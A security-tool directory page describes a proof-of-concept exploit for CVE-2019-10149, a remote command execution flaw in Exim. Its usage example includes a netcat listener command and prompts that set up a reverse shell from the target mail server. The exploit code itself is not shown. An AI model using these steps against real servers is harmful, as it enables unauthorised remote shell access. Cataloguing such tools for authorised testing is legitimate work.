Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/uyerr/poc_cve-2019-10149--rce
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubuyerr/poc_cve-2019-10149--rce

PoC_CVE-2019-10149--rce

Remote Command Execution into shell from a vulnerable exim service.

View Repository
1121 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

About

Remote Command Execution into shell from a vulnerable exim service.
Vulnerable versions go from 4.87 to 4.91 (inclusive). Check https://nvd.nist.gov/vuln/detail/cve-2019-10149.
The following script is based on Qualys PoC. Check https://packetstormsecurity.com/files/153218/Exim-4.9.1-Remote-Command-Execution.html.

Example

2 terminals recommended

root@kitploit:~
T1 $ nc -nlvp 1337
T2 $ bash exploit.sh
   $ Listener IP: 192.168.0.1
   $ Listener Port: 1337
   $ Exim IP: 10.10.0.1
   $ Exim Port: 25

Download Tool